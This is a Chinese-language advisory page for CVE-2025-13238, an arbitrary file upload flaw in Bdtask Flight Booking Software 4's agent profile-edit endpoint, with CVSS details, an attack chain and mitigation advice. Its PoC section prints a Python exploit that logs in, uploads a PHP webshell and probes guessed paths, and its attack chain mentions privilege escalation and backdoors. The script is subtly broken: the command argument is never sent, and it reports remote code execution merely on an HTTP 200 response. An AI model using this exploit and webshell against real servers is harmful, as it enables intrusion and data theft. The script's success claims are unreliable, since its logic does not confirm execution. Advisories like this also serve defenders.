CVE-2025-13238: Bdtask Flight Booking Software 4 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-13238

漏洞类型

任意文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Bdtask Flight Booking Software 4

漏洞概述

CVE-2025-13238是Bdtask Flight Booking Software 4中发现的一个中危安全漏洞，CVSS评分为6.3。该漏洞存在于系统的个人资料编辑功能中，具体位于/agent/profile/edit端点。攻击者可以利用此漏洞上传恶意文件到服务器，从而可能导致远程代码执行、敏感数据泄露或进一步的网络攻击。

Bdtask Flight Booking Software是一款基于Web的航空票务预订管理系统，广泛应用于旅行社和航空公司。该系统提供航班查询、预订管理、代理商账户管理等功能。由于系统处理大量用户敏感信息，包括个人身份信息和支付数据，因此安全性至关重要。

该漏洞的严重性在于其攻击复杂度较低，无需复杂的攻击技术即可利用。攻击者只需具备低权限账户即可发起攻击，且无需用户交互。漏洞的利用可能影响系统的机密性、完整性和可用性，导致未经授权的数据访问或系统完全沦陷。

该漏洞于2025年11月16日公开披露，相关信息已在多个漏洞数据库和安全平台上发布。值得注意的是，漏洞利用代码已公开可用，这大大降低了攻击门槛。虽然厂商在披露前收到了通知，但截至目前尚未做出回应或发布安全补丁，这使得使用该产品的组织面临较高的安全风险。

建议使用该产品的企业和个人用户立即采取缓解措施，并关注厂商的后续安全更新。对于处理敏感数据的系统，应优先考虑升级到安全的替代方案或实施额外的安全控制措施。

技术细节

该漏洞属于OWASP Top 10中的不安全的设计(A1)类别，具体为无限制文件上传(Insecure File Upload)漏洞。在Bdtask Flight Booking Software 4的代理账户个人资料编辑功能中，系统未能对用户上传的文件类型、内容和扩展名进行充分的验证和过滤。

漏洞原理分析：
1. 文件上传端点/agent/profile/edit允许已认证用户上传个人头像或相关文件
2. 系统仅检查文件扩展名或MIME类型，未对文件内容进行深度检测
3. 上传的文件存储在Web可访问目录中
4. 攻击者可以通过直接访问上传的文件路径来执行恶意代码

利用方式：
1. 攻击者首先注册或获取系统的低权限代理账户
2. 构造包含恶意代码的文件（如PHP webshell）
3. 通过修改个人资料功能上传该文件
4. 由于文件名可能被系统重命名，攻击者需要识别上传后的实际文件名
5. 通过HTTP请求访问上传的文件，触发恶意代码执行
6. 成功利用后可获得服务器远程代码执行能力

该漏洞的影响范围不仅限于个人资料图片上传，还可能涉及其他文件上传功能点。系统应实施多层安全验证机制，包括文件类型白名单、内容检查、文件名随机化和访问控制等。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用Bdtask Flight Booking Software 4，并定位到/agent/profile/edit端点

STEP 2

步骤2

账户获取：攻击者注册新代理账户或利用已存在的低权限账户进行登录

STEP 3

步骤3

恶意文件构造：创建包含webshell代码的PHP文件（如<?php system($_GET['cmd']); ?>）或其他恶意脚本

STEP 4

步骤4

文件上传：通过个人资料编辑功能上传恶意文件，系统未进行充分的文件类型和内容验证

STEP 5

步骤5

文件定位：访问上传文件目录，识别系统为文件分配的实际名称和路径

STEP 6

步骤6

远程代码执行：通过HTTP请求访问上传的webshell，传递系统命令参数实现远程代码执行

STEP 7

步骤7

权限提升与持久化：利用获得的低权限shell尝试提权，并部署后门程序实现持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-13238 PoC - Bdtask Flight Booking Software 4 Unrestricted File Upload # Target: /agent/profile/edit endpoint def exploit(target_url, username, password, webshell_content): """ Exploit for CVE-2025-13238 Args: target_url: Base URL of the vulnerable application username: Valid agent account username password: Password for the account webshell_content: Content of the webshell to upload """ session = requests.Session() # Step 1: Login to get authenticated session login_url = f"{target_url}/login" login_data = { 'email': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) if response.status_code != 200: print("[-] Login failed - check credentials") return False print("[+] Successfully authenticated") # Step 2: Upload malicious file via profile edit upload_url = f"{target_url}/agent/profile/edit" # Prepare the malicious file files = { 'profile_image': ('shell.php', webshell_content, 'application/x-php') } # Additional form data may be required data = { 'first_name': 'Test', 'last_name': 'User', 'phone': '1234567890' } response = session.post(upload_url, files=files, data=data, timeout=10) if response.status_code == 200: print("[+] File upload request sent") # Step 3: Identify uploaded file location # Common patterns: /uploads/agents/, /assets/uploads/, /media/ possible_paths = [ f"{target_url}/uploads/agents/{username}_shell.php", f"{target_url}/assets/uploads/agent_shell.php", f"{target_url}/media/agent_shell.php" ] # Step 4: Verify and execute for path in possible_paths: check_response = session.get(path, timeout=10) if check_response.status_code == 200: print(f"[+] Found uploaded shell at: {path}") print(f"[+] webshell executed - RCE achieved") return True print("[-] Exploitation failed - file may not have been uploaded") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve_2025_13238.py <target_url> <username> <password> <command>") print("Example: python cve_2025_13238.py http://target.com [email protected] pass123 'id'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] # Simple PHP webshell webshell = f"<?php system($_GET['cmd']); ?>" exploit(target, user, pwd, webshell)

影响范围

Bdtask Flight Booking Software 4 (所有已知版本)

防御指南

临时缓解措施

在厂商发布官方安全补丁之前，建议采取以下临时缓解措施：1) 限制/agent/profile/edit端点的访问权限，仅允许必要的用户角色访问；2) 在Web应用防火墙(WAF)层面添加规则，阻断.php、.phtml、.phar、.asp、.aspx、.jsp等危险文件扩展名上传；3) 临时禁用文件上传功能或将其配置为仅允许上传经过人工审核的图片格式；4) 实施严格的Content-Type和文件大小限制；5) 监控Web服务器的访问日志，密切关注异常的文件上传和访问行为；6) 考虑使用虚拟补丁技术，在应用层之前拦截恶意请求；7) 对现有用户账户进行安全审查，确保没有异常账户存在。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13238
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13238
3 Details https://www.cvedetails.com/cve/CVE-2025-13238/
4 VulDB https://vuldb.com/cve/CVE-2025-13238
5 Link https://github.com/4m3rr0r/PoCVulDb/issues/6
6 Link https://vuldb.com/?ctiid.332564
7 Link https://vuldb.com/?id.332564
8 Link https://vuldb.com/?submit.686895